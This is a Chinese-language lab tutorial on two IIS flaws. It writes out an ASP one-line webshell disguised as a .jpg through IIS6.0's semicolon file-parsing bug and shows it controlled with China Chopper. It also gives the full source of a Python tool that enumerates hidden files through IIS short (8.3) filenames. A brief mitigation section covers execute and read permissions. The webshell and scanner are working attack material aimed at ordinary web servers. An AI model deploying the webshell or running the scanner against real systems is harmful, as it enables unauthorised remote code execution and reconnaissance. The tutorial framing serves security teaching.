一、IIS6.0文件解析漏洞
1、ASP一句话木马的准备
新建木马文件“muma.txt”,将“我asp是一句话木马:<%eval request("asp")%>”写入文件中,保存后将文件名“muma.txt”改为“muma.asp;sss.jpg”。
2、将jpg木马文件放到网站目录下:
3、在浏览器中输入网址http://192.168.227.131/muma.asp;sss.jpg访问IIS6.0服务器上的木马文件。
看到报错,一句话木马没有执行,那么直接访问网站:
发现网站能访问,得出结论:当访问IIS6.0服务器上的文件“muma.asp;sss.jpg”时,由于IIS6.0具有文件解析漏洞,将文件解析为“muma.asp”,服务器对ASP、PHP等脚本文件默认使得客户无法进行访问,所以报出403.1的错误,但是却能访问html、txt等文件。
4、报出403.1的错误,进行如下配置进行解决:
(1)将网站目录授予Everyone用户读取权限:
(2)对web服扩展进行配置:
(3)将网站的执行权限设置为纯脚本:
重新访问可成功执行一句话木马:
5、中国菜刀上场
一句话木马运用结果如下:
6、解决方案
文件解析漏洞的原理是将一个看似不是脚本的文件(伪装脚本)解析成为脚本文件来执行,这其实是为了避过文件上传的防御机制众多手段之一。如果服务器上上传了一个伪装脚本,那么将IIS服务器配置为对文件的执行权限不能是脚本,也或者是不允许所有人读写脚本文件。
(1)在IIS管理界面 web属性-主目录设置文件执行权限为无。
(2)取消网站下asp文件对everyone的完全访问(读写)权限。
二、短文件名漏洞
1、环境的准备
(1)添加组件APS.NEt
(2)设置web扩展程序。
2、扫描工具:
import sys import httplib import urlparse import threading import Queue import time class Scanner(): def __init__(self, target): self.target = target.lower() if not self.target.startswith(\'http\'): self.target = \'http://%s\' % self.target self.scheme, self.netloc, self.path, params, query, fragment = \ urlparse.urlparse(target) if self.path[-1:] != \'/\': # ends with slash self.path += \'/\' self.alphanum = \'abcdefghijklmnopqrstuvwxyz0123456789_-\' self.files = [] self.dirs = [] self.queue = Queue.Queue() self.lock = threading.Lock() self.threads = [] self.request_method = \'\' self.msg_queue = Queue.Queue() self.STOP_ME = False threading.Thread(target=self._print).start() def _conn(self): try: if self.scheme == \'https\': conn = httplib.HTTPSConnection(self.netloc) else: conn = httplib.HTTPConnection(self.netloc) return conn except Exception, e: print \'[_conn.Exception]\', e return None def _get_status(self, path): try: conn = self._conn() conn.request(self.request_method, path) status = conn.getresponse().status conn.close() return status except Exception, e: raise Exception(\'[_get_status.Exception] %s\' % str(e) ) def is_vul(self): try: for _method in [\'GET\', \'OPTIONS\']: self.request_method = _method status_1 = self._get_status(self.path + \'/*~1*/a.aspx\') # an existed file/folder status_2 = self._get_status(self.path + \'/l1j1e*~1*/a.aspx\') # not existed file/folder if status_1 == 404 and status_2 != 404: return True return False except Exception, e: raise Exception(\'[is_vul.Exception] %s\' % str(e) ) def run(self): for c in self.alphanum: self.queue.put( (self.path + c, \'.*\') ) # filename, extension for i in range(20): t = threading.Thread(target=self._scan_worker) self.threads.append(t) t.start() for t in self.threads: t.join() self.STOP_ME = True def report(self): print \'-\'* 64 for d in self.dirs: print \'Dir: %s\' % d for f in self.files: print \'File: %s\' % f print \'-\'*64 print \'%d Directories, %d Files found in total\' % (len(self.dirs), len(self.files)) print \'Note that * is a wildcard, matches any character zero or more times.\' def _print(self): while not self.STOP_ME or (not self.msg_queue.empty()): if self.msg_queue.empty(): time.sleep(0.05) else: print self.msg_queue.get() def _scan_worker(self): while True: try: url, ext = self.queue.get(timeout=1.0) status = self._get_status(url + \'*~1\' + ext + \'/1.aspx\') if status == 404: self.msg_queue.put(\'[+] %s~1%s\t[scan in progress]\' % (url, ext)) if len(url) - len(self.path)< 6: # enum first 6 chars only for c in self.alphanum: self.queue.put( (url + c, ext) ) else: if ext == \'.*\': self.queue.put( (url, \'\') ) if ext == \'\': self.dirs.append(url + \'~1\') self.msg_queue.put(\'[+] Directory \' + url + \'~1\t[Done]\') elif len(ext) == 5 or (not ext.endswith(\'*\')): # .asp* self.files.append(url + \'~1\' + ext) self.msg_queue.put(\'[+] File \' + url + \'~1\' + ext + \'\t[Done]\') else: for c in \'abcdefghijklmnopqrstuvwxyz0123456789\': self.queue.put( (url, ext[:-1] + c + \'*\') ) if len(ext) < 4: # < len(\'.as*\') self.queue.put( (url, ext[:-1] + c) ) except Queue.Empty,e: break except Exception, e: print \'[Exception]\', e if __name__ == \'__main__\': if len(sys.argv) == 1: print \'Usage: python IIS_shortname_Scan.py http://www.target.com/\' sys.exit() target = sys.argv[1] s = Scanner(target) if not s.is_vul(): s.STOP_ME = True print \'Server is not vulnerable\' sys.exit(0) print \'Server is vulnerable, please wait, scanning...\' s.run() s.report()
3、扫描结果